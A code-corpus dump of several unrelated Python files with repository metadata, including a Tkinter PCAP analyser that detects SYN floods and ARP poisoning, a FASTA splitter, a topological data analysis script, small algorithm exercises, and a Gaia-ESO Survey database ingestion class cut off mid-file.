    and store it in the module-global `filename` for the analyser to use."""
    global filename
    chosen = filedialog.askopenfilename()
    # Keep only the part of the path after the 'pcaps/' directory.
    _discard, _sep, filename = chosen.partition('pcaps/')
    if filename == '':
        # Nothing selected (or the file lives outside the pcaps folder).
        import_success_label.configure(text="Unsuccessful Import - No File Imported")
    else:
        import_success_label.configure(text='{} Successfully Imported'.format(filename))
        import_success_label.grid(column=0, row=2, pady=40)
def attackselection(selection):
    """OptionMenu callback: remember which attack type the user selected."""
    global atk_selection
    atk_selection = selection
#########################################################################################################################################
#analyse button function
def analysis():
    """Run the selected attack analysis on the imported pcap.

    Validates that an attack type and a pcap file have been chosen, fills the
    analysis-tab labels with the results, colours the detection banner,
    drops a map marker for the (possibly spoofed) source IP, and finally
    switches the GUI to the analysis tab.
    """
    # Validation: an attack must be selected (outer try) and a pcap imported
    # (inner try) before any analysis can run.
    try:
        if atk_selection == "SYN Attack":
            try:
                pno, atk, src, dest, dt, prot, detection = process_pcap_syn(filename)
            except:
                messagebox.showerror('User Error', 'Error: Import PCAP File before Analysing!')
                return
        elif atk_selection == "ARP Poisoning":
            try:
                pno, atk, src, smac, dst, dmac, dt, detection = process_pcap_arp(filename)
            except:
                messagebox.showerror('User Error', 'Error: Import PCAP File before Analysing!')
                return
    except:
        messagebox.showerror('User Error', 'Error: Select Attack before Analysing!')
        return
    # Populate the analysis-tab labels for the chosen attack type.
    if atk_selection == "SYN Attack":
        # Hide the ARP-only labels left over from any previous run.
        smac_label.grid_forget()
        dmac_label.grid_forget()
        src_ip_label.configure(text='Source IP: {}'.format(src))
        src_ip_label.grid(column=0, row=0, padx=50, pady=80, ipadx=25, ipady=15)
        dest_ip_label.configure(text='Destination IP: {}'.format(dest))
        dest_ip_label.grid(column=2, row=0, padx=50, ipadx=20, ipady=15)
        time_label.configure(text='Data / Time: {}'.format(dt))
        time_label.grid(column=0, row=1, padx=50, ipadx=17, ipady=15)
        protocol_label.configure(text='Protocol: {}'.format(prot))
        protocol_label.grid(column=2, row=1, padx=50, ipadx=68, ipady=15)
        detection_label.configure(text='{}'.format(detection))
        detection_label.grid(column=1, row=3, ipadx=50, ipady=15)
    elif atk_selection == "ARP Poisoning":
        # Hide the SYN-only label left over from any previous run.
        protocol_label.grid_forget()
        src_ip_label.configure(text='{}'.format(src))
        src_ip_label.grid(column=0, row=0, padx=50, pady=80, ipadx=25, ipady=15)
        dest_ip_label.configure(text='{}'.format(dst))
        dest_ip_label.grid(column=2, row=0, padx=50, ipadx=20, ipady=15)
        time_label.configure(text='Data / Time: {}'.format(dt))
        time_label.grid(column=0, row=3, padx=50, ipadx=17, ipady=15)
        smac_label.configure(text='{}'.format(smac))
        smac_label.grid(column=0, row=1, padx=50, ipadx=17, ipady=15)
        dmac_label.configure(text='{}'.format(dmac))
        dmac_label.grid(column=2, row=1, padx=50, ipadx=68, ipady=15)
        detection_label.configure(text='{}'.format(detection))
        detection_label.grid(column=1, row=3, ipadx=30, ipady=15)
    # Detection banner: red with the packet number on attack, green otherwise.
    if atk == True:
        detection_label.configure(bg_color="red")
        detection_label.configure(text='{}\nPacket Number: {}'.format(detection, pno))
    else:
        detection_label.configure(bg_color="green")
    # Map marker: strip the port off the source address and geolocate the IP.
    truesrc, sep, tail = src.partition(":")
    lat, long = get_location(truesrc)
    for marker in markers:
        marker.delete()  # clear markers from any previous run
    try:
        # Succeeds only when the service returned usable coordinates.
        markers.append(map.set_marker(lat, long, text=truesrc))
        print("IP Avaiable for Visualisation")
        warning_label.grid(column=2, row=3)  # IP may be spoofed: show warning
    except:
        print("IP Unavailable for Visualisation")
        warning_label.grid_forget()
    # Jump straight to the analysis tab.
    time.sleep(1)
    changeframetest("analysis")
#########################################################################################################################################
#root Tk
root = customtkinter.CTk() #root Tk frame
root.attributes('-fullscreen',False) #fullscreen = false
root.geometry("1100x580") #window size
root.title('Network Traffic Analyser') #Title
root.configure(bg='#000000') #background colour
root.rowconfigure(0, weight=1) #row + column config = 1x1
root.columnconfigure(0, weight=1)
#########################################################################################################################################
#main frame
main = customtkinter.CTkFrame(root, bg_color='#4f4c4c') #main frame
main.grid(row=0,column=0,sticky='news') #grid main frame onto root
main.grid_rowconfigure(0,weight=1) #row + column config = 2x1
main.grid_columnconfigure(1, weight=1)
#########################################################################################################################################
#navigation from - left side of main frame
navigation_frame = customtkinter.CTkFrame(main, corner_radius=0) #navigation frame
navigation_frame.grid(column=0, row=0, sticky="nesw") #grid navigation onto main
navigation_frame.grid_rowconfigure(6, weight=1) #row + column config = 1x7
#-------------------------------------------------------#
#navigation frame widgets
navigation_frame_label = customtkinter.CTkLabel(navigation_frame, text=" Attack Analysis",
image=attack_symbol, compound="left", font=customtkinter.CTkFont(size=15, weight="bold")) #title
navigation_frame_label.grid(row=0, column=0,padx=(0,20), pady=20, ipadx=20)
home_button = customtkinter.CTkButton(navigation_frame, corner_radius=0, height=40, border_spacing=10, text=" Home",
fg_color="transparent", text_color=("gray10", "gray90"), hover_color=("gray70", "gray30"), #home button
image=home_symbol, anchor="w",command=lambda:changeframetest("home"))
home_button.grid(row=1, column=0, sticky="ew")
prep_frame_button = customtkinter.CTkButton(navigation_frame, corner_radius=0, height=40, border_spacing=10, text=" Preparation",
fg_color="transparent", text_color=("gray10", "gray90"), hover_color=("gray70", "gray30"), #preparation button
image=prep_symbol, anchor="w",command=lambda:changeframetest("prep"))
prep_frame_button.grid(row=2, column=0, sticky="ew")
analysis_frame_button = customtkinter.CTkButton(navigation_frame, corner_radius=0, height=40, border_spacing=10, text=" Analysis",
fg_color="transparent", text_color=("gray10", "gray90"), hover_color=("gray70", "gray30"), #analysis button
image=analysis_symbol, anchor="w",command=lambda:changeframetest("analysis"))
analysis_frame_button.grid(row=3, column=0, sticky="ew")
map_frame_button = customtkinter.CTkButton(navigation_frame, corner_radius=0, height=40, border_spacing=10, text=" Map",
fg_color="transparent", text_color=("gray10", "gray90"), hover_color=("gray70", "gray30"), #map button
image=map_symbol, anchor="w",command=lambda:changeframetest("map"))
map_frame_button.grid(row=4, column=0, sticky="ew")
exit_button = customtkinter.CTkButton(navigation_frame, text="Exit", command=root.destroy) #exit button
exit_button.grid(row=6, column=0, padx=20, pady=20, sticky="s")
#########################################################################################################################################
#home frame - 1/4 right side of main frame
home_frame = customtkinter.CTkFrame(main, corner_radius=0, fg_color="transparent") #home frame
home_frame.grid_columnconfigure(0,weight=1) #row + column config = 1x4
home_frame.grid_rowconfigure(3,weight=1)
#-------------------------------------------------------#
#home frame widgets
home_title_label = customtkinter.CTkLabel(home_frame, text= "Network Traffic Analysis Tool", compound="left", font=customtkinter.CTkFont(size=20, weight="bold")) #title
home_title_label.grid(column=0, row=0, pady=35)
home_instructions = customtkinter.CTkTextbox(home_frame, height=230, width=500, text_color='white', activate_scrollbars=False)
home_instructions.insert("0.0", " Import and analyse network traffic, and discover attacks within packets\n\n \
Visualise important data and track potential attackers\n\n\nOn the 'Preparation' Tab:\n\n\
- Import a PCAP file\n\n - Select an attack you wish to discover\n\n - Move to the 'Analysis' Tab for results\n\n - Visuale IP's on the 'Map' Tab") #instructions
home_instructions.configure(state='disabled')
home_instructions.grid(column=0, row=1)
home_image_label = customtkinter.CTkLabel(home_frame, text="", image=network_home_image, compound="center") #image
home_image_label.grid(column=0, row=3)
#########################################################################################################################################
#prep frame - 2/4 right side of main frame
prep_frame = customtkinter.CTkFrame(main, corner_radius=0, fg_color="transparent") #prep frame
prep_frame.grid_columnconfigure(0,weight=1) #row + column config = 1x5
prep_frame.grid_rowconfigure(4,weight=1)
#-------------------------------------------------------#
#preparation frame widgets
prep_title_label = customtkinter.CTkLabel(prep_frame, text= "Preparation", compound="left", font=customtkinter.CTkFont(size=20, weight="bold"), bg_color="#222222") #title
prep_title_label.grid(column=0, row=0, pady=35, ipadx=240, ipady=18)
import_button = customtkinter.CTkButton(prep_frame, text="Import PCAP", command=importfolder) #import button
import_button.grid(column=0, row=1, pady=20)
import_success_label = customtkinter.CTkLabel(prep_frame, text='', font=customtkinter.CTkFont(size=12, weight="normal")) #import success label
attack_selection = customtkinter.CTkOptionMenu(master=prep_frame, values=["SYN Attack", "ARP Poisoning"], command = attackselection) #attack selection optionmenu
attack_selection.grid(column=0, row=3, pady=40)
attack_selection.set("Select Attack")
analyse_button = customtkinter.CTkButton(prep_frame, text="Analyse",command=analysis) #analyse button
analyse_button.grid(column=0, row=4, pady=20)
#########################################################################################################################################
#analysis frame - 3/4 right side of main frame
analysis_frame = customtkinter.CTkFrame(main, corner_radius=0, fg_color="transparent") #analysis frame
analysis_frame.grid_columnconfigure(2,weight=1) #row + column config = 3x4
analysis_frame.grid_rowconfigure(3,weight=1)
#-------------------------------------------------------#
#analysis frame widgets
src_ip_label = customtkinter.CTkLabel(analysis_frame, text= "src_ip + port", compound="none", anchor='center',
font=customtkinter.CTkFont(size=12, weight="normal"), bg_color="#202020") #src_ip - universal
dest_ip_label = customtkinter.CTkLabel(analysis_frame, text= "dest_ip + port", compound="none", anchor='center',
font=customtkinter.CTkFont(size=12, weight="normal"), bg_color="#202020") #dest_ip - universal
time_label = customtkinter.CTkLabel(analysis_frame, text= "time", compound="none", anchor='center',
font=customtkinter.CTkFont(size=12, weight="normal"), bg_color="#202020") #time - universal
protocol_label = customtkinter.CTkLabel(analysis_frame, text= "protocol", compound="none", anchor='center',
font=customtkinter.CTkFont(size=12, weight="normal"), bg_color="#202020") #protocol - syn attack
detection_label = customtkinter.CTkLabel(analysis_frame, text= "<attack> <not> detected", compound="none", anchor='center', #detection - universal
font=customtkinter.CTkFont(size=12, weight="normal"), bg_color="#202020")
warning_label = customtkinter.CTkLabel(analysis_frame, text= "*Warning - IP may be spoofed, Visualisation may be inaccurate", #map warning label
compound="none", anchor='center', font=customtkinter.CTkFont(size=10, weight="normal"),
bg_color="transparent")
smac_label = customtkinter.CTkLabel(analysis_frame, text= "smac", compound="none", anchor='center', #src_mac - arp poisoning
font=customtkinter.CTkFont(size=12, weight="normal"), bg_color="#202020")
dmac_label = customtkinter.CTkLabel(analysis_frame, text= "dmac", compound="none", anchor='center', #dst_mac - arp poisoning
font=customtkinter.CTkFont(size=12, weight="normal"), bg_color="#202020")
#########################################################################################################################################
#map frame - 4/4 right side of main frame
map_frame = customtkinter.CTkFrame(main, corner_radius=0, fg_color="transparent") #map frame
map_frame.grid_columnconfigure(0,weight=1) #row + column config = 1x1
map_frame.grid_rowconfigure(0,weight=1)
#-------------------------------------------------------#
#map frame widgets
markers = [] #array of map markers
map = tkintermapview.TkinterMapView(map_frame, width=880, height=700, corner_radius=0) #map
map.set_tile_server("https://mt0.google.com/vt/lyrs=m&hl=en&x={x}&y={y}&z={z}&s=Ga", max_zoom=22) #map type = googlemaps
map.set_address("Europe") #intial address = Europe
map.set_zoom(1) #zoom = 1, view world map
map.grid(column=0, row=0) #grid map onto map_frame
#########################################################################################################################################
#entrypoint / start
changeframe(main) #initialise / changeframe to main
root.mainloop() #gui continuation
| LHM2/PCAP_Analysis_Tool | project.py | project.py | py | 37,694 | python | en | code | 0 | github-code | 90 |
70211260137 | import pprint
import re
import sys
"""
File takes a fasta files and a path and outputs each sequence in it's
own file
# python split_fasta.py [FILE] [PATH]
"""
print("Usage: > python split_fasta.py [FASTA FILE] [PATH]")

header = ""
seq = ""
uniref_id = ""

# Capture everything between '>' and the first whitespace as the sequence ID.
pattern = re.compile(r"^>(.+?)\s+")


def _write_record(out_dir, seq_id, hdr, sequence):
    """Write one FASTA record (header line + sequence) to <out_dir>/<seq_id>.fasta."""
    with open(out_dir + "/" + seq_id + ".fasta", "w") as out:
        out.write(hdr)
        out.write(sequence)


with open(sys.argv[1]) as infile:
    for line in infile:
        if line.startswith(">"):
            # Flush the previous record before starting a new one.
            # (Bug fix: `if len(uniref_id) is not 0` tested object identity
            # against an int; replaced with a plain truthiness check.)
            if uniref_id:
                _write_record(sys.argv[2], uniref_id, header, seq)
                seq = ""
            header = line
            uniref_id = pattern.match(line).group(1)
        else:
            seq += line

# Bug fix: the last record in the file was silently dropped before because
# nothing flushed it after the loop finished.
if uniref_id:
    _write_record(sys.argv[2], uniref_id, header, seq)
| DanBuchan/bin_tools | split_fasta.py | split_fasta.py | py | 850 | python | en | code | 0 | github-code | 90 |
# NOTE(review): notebook-style script.  `load_file`, `np`, `plot_point_cloud`
# and `activities100` are not defined in this file -- presumably provided by
# the surrounding notebook/session; confirm before running standalone.
hist_file="history_wrists" #nov 13
hist_wrist = load_file(hist_file)
# manually random split
# Each entry appears to be (dataset, users, activities, raw_files) per source
# video -- TODO confirm against load_file's contract.
dataset, users, activities, raw_files = hist_wrist['_1.mp4']
dataset2, users2, activities2, raw_files2 = hist_wrist['_2.mkv']
dataset3, users3, activities3, raw_files3 = hist_wrist['_3.mp4']
# create point cloud array
# De-interleave each flat (x,y,z,x,y,z,...) series into an (n_points, 3) cloud.
pt_cloud_array = []
nrows = 100
for i in range(nrows):
    series = dataset[i]
    x_ser = series[::3]
    y_ser = series[1::3]
    z_ser = series[2::3]
    pt_cloud_current = np.stack((x_ser, y_ser, z_ser), axis=-1)
    pt_cloud_array.append(pt_cloud_current)
# print shape
print(np.shape(pt_cloud_array))
# plot one of its rows
pt_cloud = pt_cloud_array[1]
plot_point_cloud(pt_cloud)
# fit
from gtda.homology import VietorisRipsPersistence
# Track connected components, loops, and voids
homology_dimensions = [0, 1, 2]
# Collapse edges to speed up H2 persistence calculation!
persistence = VietorisRipsPersistence(
    metric="euclidean",
    homology_dimensions=homology_dimensions,
    n_jobs=6,
    collapse_edges=True,
)
# Persistence diagrams: one per point cloud.
diagrams_basic = persistence.fit_transform(pt_cloud_array)
# plot
from gtda.plotting import plot_diagram
# Circle
plot_diagram(diagrams_basic[0])
# map to less # of pts
# Reduce each diagram to one persistence-entropy value per homology dimension.
from gtda.diagrams import PersistenceEntropy
persistence_entropy = PersistenceEntropy()
# calculate topological feature matrix
X_basic = persistence_entropy.fit_transform(diagrams_basic)
# expect shape - (n_point_clouds, n_homology_dims)
print(X_basic.shape)
# train classifier, evaluate on same set
from sklearn.ensemble import RandomForestClassifier
rf = RandomForestClassifier(oob_score=True)
# NOTE(review): `activities100` is undefined in this chunk -- presumably the
# first 100 activity labels matching nrows above; verify.
rf.fit(X_basic, activities100)
print(f"OOB score: {rf.oob_score_:.3f}")
| sy2657/activity_recognition | topological/preprocess_and_fit_data.py | preprocess_and_fit_data.py | py | 1,705 | python | en | code | 0 | github-code | 90 |
72495849578 | from collections import deque
from copy import copy
import pytest
class Solution:
    def exist(self, board, word):
        """Return True if `word` can be traced through horizontally/vertically
        adjacent cells of `board`, using each cell at most once.

        :type board: List[List[str]]
        :type word: str
        :rtype: bool
        """
        if not word:
            return False
        for i, row in enumerate(board):
            for j in range(len(row)):
                if self.search_from_letter((i, j), board, word):
                    return True
        return False

    def search_from_letter(self, coordinates, grid, word, visited=None):
        """Depth-first search for `word` starting at `coordinates`.

        `visited` holds the cells already used on the current path.
        Performance fix: the set is shared and undone on backtrack
        (add/discard) instead of copied per branch, removing the O(path)
        set copy the old implementation paid at every recursion step.
        Note: `visited` may be mutated by a successful call.
        """
        if visited is None:
            visited = set()
        if grid[coordinates[0]][coordinates[1]] != word[0]:
            return False
        if len(word) == 1:
            return True
        visited.add(coordinates)
        for offset in ((0, 1), (0, -1), (-1, 0), (1, 0)):
            neighbour = (coordinates[0] + offset[0], coordinates[1] + offset[1])
            if (
                0 <= neighbour[0] < len(grid)
                and 0 <= neighbour[1] < len(grid[0])
                and neighbour not in visited
            ):
                if self.search_from_letter(neighbour, grid, word[1:], visited):
                    return True
        visited.discard(coordinates)  # backtrack: free the cell for other paths
        return False
# Parametrised regression tests for Solution.exist: one reachable word and one
# case ("aaa" on a 1x2 board) that would require reusing a cell.
@pytest.mark.parametrize(
    "board,word,expected",
    [
        (
            [["A", "B", "C", "E"], ["S", "F", "C", "S"], ["A", "D", "E", "E"]],
            "ABCCED",
            True,
        ),
        ([["a", "a"]], "aaa", False),
    ],
)
def tests_a(board, word, expected):
    """Check Solution.exist against the expected result for each parametrised case."""
    assert Solution().exist(board, word) == expected
| enanablancaynumeros/interview_exercises | string_exist_in_grid.py | string_exist_in_grid.py | py | 1,616 | python | en | code | 0 | github-code | 90 |
2939144859 | import asyncio
from temporalio.client import (
Client,
ScheduleActionStartWorkflow,
ScheduleUpdate,
ScheduleUpdateInput,
)
async def main():
client = await Client.connect("localhost:7233")
handle = client.get_schedule_handle(
"workflow-schedule-id",
)
async def update_schedule_simple(input: ScheduleUpdateInput) -> ScheduleUpdate:
schedule_action = input.description.schedule.action
if isinstance(schedule_action, ScheduleActionStartWorkflow):
schedule_action.args = ["my new schedule arg"]
return ScheduleUpdate(schedule=input.description.schedule)
await handle.update(update_schedule_simple)
if __name__ == "__main__":
asyncio.run(main())
| temporalio/samples-python | schedules/update_schedule.py | update_schedule.py | py | 734 | python | en | code | 68 | github-code | 90 |
8620370984 | #Nikhil Vemula
#Feb 16 2016
#CS61002 Algorithm & Programming 1
#American flag in turtle.py
import turtle #To use graphics
#WIKIPEDIA INFO
'''Hoist (width) of flag: A = 1.0
Fly (length) of flag: B = 1.9
Hoist (width) of Union: C = 0.5385 (7/13)
Fly (length) of Union: D = 0.76
E = F = 0.054
G = H = 0.063
Diameter of star: K = 0.0616
Width of stripe: L = 0.0769 (1/13)
'''
#function to determine rgb colors
def get_color(color):
r=0
b=0
g=0
if color=='red':
r=1
b=0
c=0
elif color=='green':
r=0
b=0
g=1
elif color=='blue':
r=0
b=1
g=0
elif color=='white':
r=1
b=1
g=1
elif color=='black':
r=0
b=0
g=0
return r,g,b
#function to draw rectangle
def draw_rectangle(length,height,color):
    """Draw the flag background, the 13 stripes and the blue union canton.

    The pen starts at (-150, 150) (top-left corner of the flag).  Despite the
    name, this routine draws the whole flag body and finally calls
    createstar() to add the stars.
    """
    turtle.up()
    turtle.speed(1000)
    r,g,b = get_color(color)
    turtle.color(r,g,b)
    turtle.begin_fill()
    turtle.setpos(-150,150)
    turtle.down()
    # Outline the full flag rectangle and fill it with the base color (red).
    turtle.forward(length)
    turtle.right(90)
    turtle.forward(height)
    turtle.right(90)
    turtle.forward(length)
    turtle.right(90)
    turtle.forward(height)
    turtle.end_fill()
    # Union (star field) dimensions per the ratios quoted above: hoist 7/13
    # of the flag height, fly 0.76 of the flag length (halved here).
    starbox_height = height*0.5385
    starbox_width = (length*0.76)/2
    # 13 stripes; each stripe is 1/13 of the hoist.
    redStripes_height = float(round(height/13,1))
    newyPos = 150-redStripes_height
    for i in range(1,14):
        turtle.setpos(-150,newyPos)
        if i%2!=0:
            # Odd stripes are painted white on top of the red background.
            r,g,b = get_color('white')
            turtle.color(r,g,b)
            turtle.begin_fill()
            turtle.right(90)
            turtle.forward(length)
            turtle.right(90)
            turtle.forward(redStripes_height)
            turtle.right(90)
            turtle.forward(length)
            turtle.right(90)
            turtle.forward(redStripes_height)
            turtle.end_fill()
        else:
            # Even stripes stay red (the background shows through).
            r,g,b=get_color('red')
        newyPos = newyPos - redStripes_height
    # Blue canton in the top-left corner.
    r,g,b = get_color('blue')
    turtle.setpos(-150,150)
    turtle.color(r,g,b)
    turtle.begin_fill()
    turtle.up()
    turtle.right(90)
    turtle.forward(starbox_width)
    turtle.right(90)
    turtle.forward(starbox_height)
    turtle.right(90)
    turtle.forward(starbox_width)
    turtle.right(90)
    turtle.forward(starbox_height)
    turtle.end_fill()
    createstar()
def createstar():
    """Lay out the 50 stars of the union as alternating rows.

    Five rows of six stars interleaved with four rows of five stars, using
    hard-coded offsets that match the canton drawn by draw_rectangle().
    """
    size =8
    defxpos = -135
    defypos = 135
    # 5 rows of 6 stars.
    for j in range(0,5):
        defxpos = -135
        for i in range(0,6):
            draw_star(size,'white',defxpos,defypos)
            defxpos = defxpos+22
        defypos = defypos-21
    defxpos = -135
    defypos = 125.5
    # 4 offset rows of 5 stars, shifted half a column to the right.
    for j in range(0,4):
        defxpos = -124
        for i in range(0,5):
            draw_star(size,'white',defxpos,defypos)
            defxpos = defxpos+22
        defypos = defypos-21
    # Park the pen out of the way when done.
    turtle.up()
    turtle.goto(-200,200)
#function to draw a star
def draw_star(size, color, xpos, ypos):
    """Draw one filled five-pointed star of edge length ``size`` at (xpos, ypos)."""
    red, green, blue = get_color(color)
    turtle.up()
    turtle.color(red, green, blue)
    turtle.setpos(xpos, ypos)
    turtle.begin_fill()
    turtle.down()
    # Five edges with 144-degree left turns trace a pentagram outline.
    for _ in range(5):
        turtle.forward(size)
        turtle.left(144)
    turtle.end_fill()
#function to draw a flag
def draw_flag(height):
    """Draw a complete flag of the given hoist; fly is 1.9x per the spec above."""
    draw_rectangle(height*1.9,height,'red')
draw_flag(1.0*200)
| radam0/Python | CS61002 Labs/Lab04.py | Lab04.py | py | 3,441 | python | en | code | 0 | github-code | 90 |
39304251409 | #binary search is better than linear search when the list of elements are more. in case of binary search we must have the elements in sorted order
def Bsearch(lst, n):
    """Binary-search the sorted list ``lst`` for ``n``.

    Returns True when found and records the matching index in the module
    global ``pos2`` (a side effect the calling script reads); otherwise
    returns False and leaves ``pos2`` untouched.
    """
    low, high = 0, len(lst) - 1
    while low <= high:
        middle = (low + high) // 2
        probe = lst[middle]
        if probe == n:
            # The driver script reads the hit position through this global.
            globals()['pos2'] = middle
            return True
        if probe < n:
            low = middle + 1
        else:
            high = middle - 1
    return False
# Demo driver: Bsearch updates the module-level pos2 via globals() on a hit.
pos2=-1
lst = [1,2,3,4,5,6,7,8,9]
n = 9
if Bsearch(lst,n):
    # pos2 now holds the 0-based index; print it 1-based for the user.
    print("element found in location ",pos2+1)
else:
    print("element not found")
3393060834 | from unittest import TestCase
from icm.modular_test import ProcessModule, Compose, DataInit, Loop
class AppenderModule(ProcessModule):
    """Test module that appends the current length of ``array`` to it.

    Requires the shared-data key "array"; each run() extends it by one
    element equal to its pre-append length (0, 1, 2, ...).
    """
    required_keys = ["array"]
    def run(self):
        self.array.append(len(self.array))
class EpochsLoop(Loop):
    """Loop that repeats its body until ``array`` reaches ``hp.max_length``."""
    # Requires the nested hyper-parameter key hp.max_length in the shared data.
    required_keys = [{"hp": ["max_length"]}]
    def terminate(self):
        # Stop once the array has grown to the configured maximum length.
        return len(self.array) >= self.hp.max_length
class TestModular(TestCase):
    """Unit tests for the Compose/DataInit/Loop plumbing in icm.modular_test."""
    def test_data_passage(self):
        """Data seeded by DataInit flows through sequential modules."""
        graph = Compose(
            DataInit({"array": []}),
            AppenderModule(),
            AppenderModule(),
            AppenderModule(),
        )()
        self.assertEqual(graph.array, [0, 1, 2])
    def test_loop(self):
        """EpochsLoop repeats AppenderModule until max_length is reached."""
        graph = Compose(
            DataInit({"array": []}),
            AppenderModule(),
            DataInit({"hp": {"max_length": 10}}),
            EpochsLoop(AppenderModule()),
        )()
        self.assertEqual(graph.array, list(range(10)))
| Akhilez/reward_lab | curiosity/icm/test_modular.py | test_modular.py | py | 937 | python | en | code | 2 | github-code | 90 |
class StackOfPlates:
    """Set-of-stacks: a list of sub-stacks, each capped at ``stack_size``.

    New values land in the first sub-stack with spare capacity; pops come
    from the last sub-stack, and emptied sub-stacks are discarded.
    """
    def __init__(self, stack_size):
        self.stacks = []  # list of sub-stacks (plain lists)
        self.stack_size = stack_size  # capacity of each sub-stack
    def push(self, value):
        """Append ``value``, opening a new sub-stack when all are full."""
        if (len(self.stacks) - 1) < self.index_of_push_able_stack():
            self.stacks.append([])
        self.stacks[self.index_of_push_able_stack()].append(value)
    def pop(self):
        """Remove and return the top value of the last sub-stack.

        Raises Exception on an empty structure.  Fix: the original
        discarded the popped value instead of returning it.
        """
        if self.is_empty():
            raise Exception("Empty Stack !!")
        value = self.stacks[-1].pop()
        if not self.stacks[-1]:
            # Drop the now-empty trailing sub-stack.
            self.stacks.pop()
        return value
    def peek(self):
        """Print and return the top value without removing it.

        Raises Exception on an empty structure.  The print is kept for
        backward compatibility; the value is now also returned.
        """
        if self.is_empty():
            raise Exception("Empty Stack !!")
        top = self.stacks[-1][-1]
        print(top)
        return top
    def is_empty(self):
        """Return True when there are no sub-stacks at all."""
        return not self.stacks
    def print_stacks(self):
        """Debug helper: print the raw list of sub-stacks."""
        print(self.stacks)
    def index_of_push_able_stack(self):
        """Return the index of the first non-full sub-stack, or len(stacks)."""
        for index, stack in enumerate(self.stacks):
            if len(stack) != self.stack_size:
                return index
        return len(self.stacks)
# Demo: exercise a set-of-stacks with capacity 2 per sub-stack.
stack = StackOfPlates(2)
stack.push(10)
stack.push(20)
stack.push(30)
stack.push(40)
stack.push(50)
stack.push(60)
stack.push(70)
stack.push(80)
stack.push(0)
stack.push(90)
stack.push(100)
stack.push(50)
stack.push(60)
stack.push(80)
stack.print_stacks()
# Remove the last three values, then show the remaining layout and the top.
stack.pop()
stack.pop()
stack.pop()
stack.print_stacks()
stack.peek()
13633640595 |
""" A specialized database class for Gaia-ESO Survey data releases. """
import logging
import numpy as np
from astropy.io import fits
from astropy.table import Table
import utils
from db import Database
logger = logging.getLogger("ges")
class GESDatabase(Database):
    """Database wrapper specialised for Gaia-ESO Survey data-release ingestion.

    Adds node bookkeeping (create/retrieve node ids) and bulk ingestion of
    FITS tables into the recommended_idr4, results and spectra tables.
    """
    def __init__(self, *args, **kwargs):
        super(GESDatabase, self).__init__(*args, **kwargs)
    def create_or_retrieve_node_id(self, wg, node_name):
        """
        Retrieve a unique identifier for a node, creating it if necessary.
        :param wg:
            The working group (e.g., 10).
        :param node_name:
            The name of the node.
        """
        try:
            return self.retrieve_node_id(wg, node_name)
        except UnknownNodeError:
            return self._create_node(wg, node_name)
    def retrieve_node_id(self, wg, node_name):
        """
        Retrieve a unique identifier for a node.
        :param wg:
            The working group (e.g., 10).
        :param node_name:
            The name of the node (matched case-insensitively).
        :raises UnknownNodeError:
            If no node exists.
        :returns:
            The identifier.
        """
        result = self.retrieve("""SELECT id FROM nodes
            WHERE wg = %s AND lower(name) = %s""",
            (utils.wg_as_int(wg), node_name.strip().lower(), ))
        if not result:
            raise UnknownNodeError("node does not exist")
        else:
            return int(result[0][0])
    def _create_node(self, wg, node_name):
        """
        Create a node and return its new database id.
        :param wg:
            The working group (e.g., 10).
        :param node_name:
            The name of the node.
        """
        wg = utils.wg_as_int(wg)
        node_name = node_name.strip()
        result = self.execute(
            """INSERT INTO nodes (wg, name) VALUES (%s, %s) RETURNING id""",
            (wg, node_name), fetch=True)
        node_id = int(result[1][0][0])
        logger.info("Created node '{}' in WG{} with id {}".format(
            node_name, wg, node_id))
        return node_id
    def ingest_recommended_results_from_previous_dr(self, filename, extension=-1):
        """
        Ingest recommended results from a previous data release FITS file
        into the recommended_idr4 table.
        :param filename:
            A node template file in FITS format.
        :param extension: [optional]
            The extension index to read from.
        :returns:
            The number of rows inserted.
        """
        image = fits.open(filename)
        data = image[extension].data
        columns = ("cname", "ges_fld", "object", "filename", "ges_type",
            "teff", "e_teff", "logg", "e_logg", "mh", "e_mh", "xi", "e_xi",
            "peculi", "remark", "tech")
        # Numeric columns are coerced to float before insertion.
        fits_format_adapters = {
            "teff": float,
            "e_teff": float,
            "logg": float,
            "e_logg": float,
            "mh": float,
            "e_mh": float,
            "xi": float,
            "e_xi": float,
        }
        N = len(data)
        for i, row in enumerate(data):
            logger.info("Ingesting recommended row {}/{}".format(i, N))
            row_data = {}
            for column in columns:
                value = row[column]
                f = fits_format_adapters.get(column, None)
                if f is not None:
                    value = f(value)
                row_data[column] = value
            self.execute(
                "INSERT INTO recommended_idr4 ({}) VALUES ({})".format(
                    ", ".join(columns),
                    ", ".join(["%({})s".format(column) for column in columns])),
                row_data)
        # Single commit after all rows are staged.
        self.connection.commit()
        return N
    def ingest_node_results(self, filename, extension=-1):
        """
        Ingest results from a node FITS file into the results table.
        The node is identified from the filename itself.
        :param filename:
            A node template file in FITS format.
        :param extension: [optional]
            The extension index to read from.
        :returns:
            The number of rows inserted.
        """
        # Which node is this?
        wg, node_name = utils.parse_node_filename(filename)
        node_id = self.retrieve_node_id(wg, node_name)
        # Start ingesting results.
        data = Table.read(filename, hdu=extension)
        default_row = {"node_id": node_id}
        columns = (
            "node_id", "cname", "filename", "setup", "snr",
            "vel", "e_vel", "vrot", "e_vrot",
            "teff", "e_teff", "nn_teff", "enn_teff", "nne_teff", "sys_err_teff",
            "logg", "e_logg", "nn_logg", "enn_logg", "nne_logg", "sys_err_logg", "lim_logg",
            "feh", "e_feh", "nn_feh", "enn_feh", "nne_feh", "sys_err_feh",
            "xi", "e_xi", "nn_xi", "enn_xi", "nne_xi",
            "mh", "e_mh", "nn_mh", "enn_mh", "nne_mh",
            "alpha_fe", "e_alpha_fe", "nn_alpha_fe", "enn_alpha_fe", "nne_alpha_fe",
            "vrad", "e_vrad", "vsini", "e_vsini",
            "peculi", "remark", "tech")
        fits_format_adapters = {
            "snr": float,
            "vel": float,
            "e_vel": float,
            "vrot": float,
            "e_vrot": float,
            "teff": float,
            "e_teff": float,
            "nn_teff": int,
            "enn_teff": float,
            "nne_teff": float,
            "sys_err_teff": float,
            "logg": float,
            "e_logg": float,
            "nn_logg": int,
            "enn_logg": float,
            "nne_logg": float,
            "sys_err_logg": float,
            "lim_logg": int,
            "feh": float,
            "e_feh": float,
            "nn_feh": int,
            "enn_feh": float,
            "nne_feh": float,
            "sys_err_feh": float,
            "xi": float,
            "e_xi": float,
            "nn_xi": int,
            "enn_xi": float,
            "nne_xi": float,
            "mh": float,
            "e_mh": float,
            "nn_mh": int,
            "enn_mh": float,
            "nne_mh": float,
            "alpha_fe": float,
            "e_alpha_fe": float,
            "nn_alpha_fe": int,
            "enn_alpha_fe": float,
            "nne_alpha_fe": float,
            "vrad": float,
            "e_vrad": float,
            "vsini": float,
